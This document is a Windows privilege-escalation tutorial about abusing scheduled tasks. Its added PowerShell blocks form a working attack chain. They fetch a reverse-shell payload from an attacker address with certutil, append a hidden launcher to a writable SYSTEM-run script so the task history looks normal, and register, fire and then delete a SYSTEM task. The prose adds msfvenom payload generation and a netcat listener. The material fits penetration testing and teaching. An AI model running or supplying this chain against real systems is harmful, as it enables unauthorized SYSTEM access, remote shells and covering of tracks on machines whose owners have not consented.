
Windows Privilege Escalation – Scheduled Tasks

Introduction

Windows, like most operating systems, provides a way of scheduling programs or scripts to run at set times or intervals, which helps automate recurring jobs. When improperly configured, these tasks often become weaknesses that let an attacker escalate privileges to SYSTEM or Administrator.

This guide will go through the main methods used to exploit scheduled tasks.

Task Scheduler

Task Scheduler is a component of Microsoft Windows that provides the ability to schedule the launch of programs or scripts at pre-defined times or after specified time intervals.

The schtasks command-line utility can be used in Windows systems to list, edit or create scheduled tasks. It can be used in the following manner to view all existing tasks:

schtasks /query /fo LIST /v 

The output can also be piped through the findstr command-line utility to search for, or exclude, certain text.

The Powershell Get-ScheduledTask utility can also be used to enumerate scheduled tasks:

Get-ScheduledTask | ft TaskName,TaskPath,State

A Where-Object filter on TaskPath can be used to exclude Windows' default tasks, which live under the \Microsoft\ path.

Automated enumeration scripts such as WinPEAS will also enumerate scheduled tasks in a Windows system.

Unfortunately for us, Windows only shows a standard user the details of tasks it has permission to read, which in practice often means just the tasks it created itself. The only reliable way to find out whether a task running as a privileged account launches a script or binary the current user can tamper with is therefore to enumerate the files on the system and check their permissions.
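As an added example (this is not code from the original article), the PowerShell below ties the enumeration steps together and goes a little beyond the page: it drops the default tasks under \Microsoft\ with a Where-Object filter (the schtasks equivalent is piping the query through `findstr /v /i "\Microsoft\"`), pulls the executable and any script path out of each remaining task's action, and tests whether the current user can open those files for writing. It assumes a PowerShell 3.0 or later host, since the ScheduledTasks module it uses ships with Windows 8 / Server 2012 and later; the output column names are my own.

```powershell
# Added example (not from the original article): list non-default scheduled tasks and
# flag any whose action points at a file the current user can write to.
# Requires the ScheduledTasks module (Windows 8 / Server 2012 and later).

# Windows' own tasks live under \Microsoft\; everything else is worth a look.
$tasks = Get-ScheduledTask | Where-Object { $_.TaskPath -notlike '\Microsoft\*' }

foreach ($task in $tasks) {
    $info = $task | Get-ScheduledTaskInfo
    foreach ($action in $task.Actions) {
        # Only "Execute" actions have a program path; COM-handler actions do not.
        if (-not $action.Execute) { continue }

        # Expand %SystemRoot%-style variables and strip surrounding quotes.
        $exe = [Environment]::ExpandEnvironmentVariables($action.Execute).Trim('"')
        $argString = $action.Arguments

        # When the task runs powershell.exe or cmd.exe, the interesting file is in the
        # arguments (e.g. "-File C:\Scripts\Backup.ps1"), so pull out path-looking tokens.
        # Paths containing spaces get cut at the space; good enough for a first pass.
        $targets = @($exe)
        if ($argString) {
            $found = [regex]::Matches($argString, '[A-Za-z]:\\[^\s"]+') | ForEach-Object { $_.Value }
            if ($found) { $targets += $found }
        }

        foreach ($path in $targets) {
            if (-not (Test-Path -LiteralPath $path)) { continue }

            # Effective-permission check: opening for append succeeds only if we can write.
            # Nothing is written; the handle is closed straight away. Any failure
            # (access denied, file locked) is treated as "not writable".
            $writable = $false
            try {
                $fs = [System.IO.File]::Open($path, 'Append', 'Write')
                $fs.Close()
                $writable = $true
            } catch { $writable = $false }

            [pscustomobject]@{
                Task     = $task.TaskPath + $task.TaskName
                RunAs    = $task.Principal.UserId
                State    = $task.State
                NextRun  = $info.NextRunTime
                Target   = $path
                Writable = $writable
            }
        }
    }
}
```

A row with RunAs set to SYSTEM (or another privileged account) and Writable set to True is the situation the rest of this guide exploits. Tasks the current user is not allowed to read are simply absent from Get-ScheduledTask's output, which is why a file-system sweep is still needed when nothing promising shows up.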

Exploiting Scheduled Tasks

There are two main ways to exploit scheduled tasks in Windows:

  • Weak file permissions on the script or binary run by the scheduled task
  • Creating or modifying scheduled tasks (only works in older versions of Windows)

Exploiting Weak File Permissions

In the example below, the “Backup” scheduled task is running the Backup.ps1 Powershell script every day at 10:00am.


The schtasks command will display all of the properties for a given scheduled task, such as the author, the task to run, the frequency etc.

AccessChk is a command-line tool for viewing the effective permissions on files, registry keys, services, processes, kernel objects, and more. This tool will be helpful to identify whether the current user can modify the Backup.ps1 script which is run by the “Backup” scheduled task.

The tool is part of Microsoft's Sysinternals suite and can be downloaded from the linked GitHub repository.

When executing any of the sysinternals tools for the first time the user will be presented with a GUI pop-up to accept the EULA. This can be bypassed with an extra command line flag to automatically accept the EULA.

.\accesschk.exe /accepteula -quvw stef C:\Users\Administrator\Desktop\Backup.ps1

As shown above, the current user has full access to the Backup.ps1 script, meaning additional code can be added to it, which will be executed when the scheduled task runs.

For this example, a reverse shell can be generated using MSFvenom, with the following flags:

  • -p to specify the payload type, in this case the Windows reverse TCP shell
  • LHOST to specify the local host IP address to connect to
  • LPORT to specify the local port to connect to
  • -f to specify the format, in this case exe

The resulting shell.exe file is then transferred to the Windows victim machine by serving it from a Python web server on the attacking host and fetching it with the Windows Certutil utility.

Since the current user has access to edit the Backup.ps1 script, the easiest way to exploit this is to simply add an extra line to it which will execute the reverse shell:

echo path_to_shell >> path_to_scheduled_script

The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

Once the scheduled task runs, the PowerShell script executes the added line, connecting back to the listener and granting a remote shell with the privileges of the account the task runs as:
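The whole victim-side procedure, as an added example rather than code from the original article, with the drop done from PowerShell instead of cmd's echo: it fetches the payload with certutil, backs up the target script, and appends a launcher line. Assumed values are the attacker address 10.10.14.5 (serving the file with python3 -m http.server 80 and listening with nc -lvnp 4444), the payload built with msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o shell.exe, and C:\Temp\shell.exe as an arbitrary drop location; the script path is the one checked with accesschk above.

```powershell
# Added example (not from the original article): drop the payload and hook it into the
# writable Backup.ps1 so it runs the next time the "Backup" task fires.
# Assumptions: attacker at 10.10.14.5 serving shell.exe over HTTP on port 80 and listening
# on 4444; C:\Temp\shell.exe is an arbitrary drop location on the victim.

$script  = 'C:\Users\Administrator\Desktop\Backup.ps1'
$payload = 'C:\Temp\shell.exe'

# Fetch the payload with certutil, which is present on every Windows build
# (-f overwrites an existing file, -split writes the downloaded blob to disk).
New-Item -ItemType Directory -Path (Split-Path $payload) -Force | Out-Null
certutil.exe -urlcache -split -f "http://10.10.14.5/shell.exe" $payload

# Keep a copy of the original script so it can be restored after the engagement.
Copy-Item -LiteralPath $script -Destination "$script.bak"

# Launch the payload in its own process. A bare "C:\Temp\shell.exe" line would block the
# script, and therefore the task, for as long as the reverse shell stays open; Start-Process
# returns immediately, so the script's real work still completes and the task history looks
# normal. The leading newline guards against the script not ending with one.
$launcher = "Start-Process -FilePath '$payload' -WindowStyle Hidden"
Add-Content -LiteralPath $script -Value "`r`n$launcher"

# Confirm the edit landed and see when the task will next run it.
Get-Content -LiteralPath $script -Tail 3
Get-ScheduledTask -TaskName 'Backup' | Get-ScheduledTaskInfo | Select-Object LastRunTime, NextRunTime
```

If the current user is not allowed to read the task definition, the final Get-ScheduledTask call fails; the append still works, and the run time has to be taken from whatever enumeration found the task in the first place.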

Creating a New Scheduled Task

This method only works on older versions of Windows (Windows 2000, XP or 2003), and the current user must already be a local administrator to be able to create new scheduled tasks.

This vulnerability exists because older versions of Windows used to run every scheduled task with system-level privileges, regardless of the owner of the task.

After generating a malicious shell using MSFvenom and placing it in an arbitrary folder, in the same way as the previous exploitation process, a new scheduled task can be created with one of the following commands:

:: check the current system time (/t only displays it; without the switch "time" prompts for a new value)
time /t
:: Windows 2000/XP/2003: the at command runs the job as SYSTEM; replace 10:00 with a minute or two past the time shown
at 10:00 /interactive "path_to_shell"
:: newer versions of Windows: the task runs as its creator unless /RU SYSTEM is given (needs an elevated prompt);
:: /SC MINUTE makes it fire every minute from HH:MM onwards
SCHTASKS /CREATE /SC MINUTE /TN "Task Name" /TR "path_to_shell" /ST HH:MM /RU SYSTEM

After setting up the scheduled task, a Netcat listener can be setup to catch the reverse shell and gain remote access to the target system.

The following command can be used to make sure the Task Scheduler service is running:

net start "Task Scheduler"
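The same thing done from PowerShell on a modern Windows version, as an added example that is not part of the original article: it creates a one-shot task that runs the payload as SYSTEM, triggers it, checks the result and removes the definition again. It requires an elevated (local administrator) session and the ScheduledTasks module (Windows 8 / Server 2012 and later). The task name "Updater" and the payload path C:\Temp\shell.exe are assumed values.

```powershell
# Added example (not from the original article): create, fire and remove a task that runs
# the payload as SYSTEM on a modern Windows host. Must be run from an elevated session.
# Assumptions: payload already dropped at C:\Temp\shell.exe; "Updater" is an arbitrary task name.

$payload  = 'C:\Temp\shell.exe'
$taskName = 'Updater'

# The Task Scheduler service (service name "Schedule") must be running.
if ((Get-Service -Name Schedule).Status -ne 'Running') { Start-Service -Name Schedule }

$action  = New-ScheduledTaskAction -Execute $payload
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1)

# On modern Windows a task runs as whoever created it unless told otherwise,
# so ask for SYSTEM explicitly; this is what /RU SYSTEM does for schtasks.
$principal = New-ScheduledTaskPrincipal -UserId 'SYSTEM' -LogonType ServiceAccount -RunLevel Highest

Register-ScheduledTask -TaskName $taskName -Action $action -Trigger $trigger -Principal $principal -Force | Out-Null

# No need to wait for the trigger; fire it straight away.
Start-ScheduledTask -TaskName $taskName
Start-Sleep -Seconds 2

# LastTaskResult 267009 (0x41301) means the action is still running, which is exactly
# what a live reverse shell looks like; anything else means the payload exited.
Get-ScheduledTask -TaskName $taskName | Get-ScheduledTaskInfo | Select-Object LastRunTime, LastTaskResult

# Remove the task definition once the shell is established.
Unregister-ScheduledTask -TaskName $taskName -Confirm:$false
```

Register-ScheduledTask fails with an access-denied error from a non-elevated session, which is the practical reason this route only helps an attacker who is already a local administrator and wants to step up to SYSTEM.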

Conclusion

Scheduled tasks have been an exploitation vector for a very long time, since there has always been a need for automation, and there is more of it now than ever.

They should be configured carefully, especially when they run as SYSTEM or another privileged account, as a weak task can lead to full system compromise.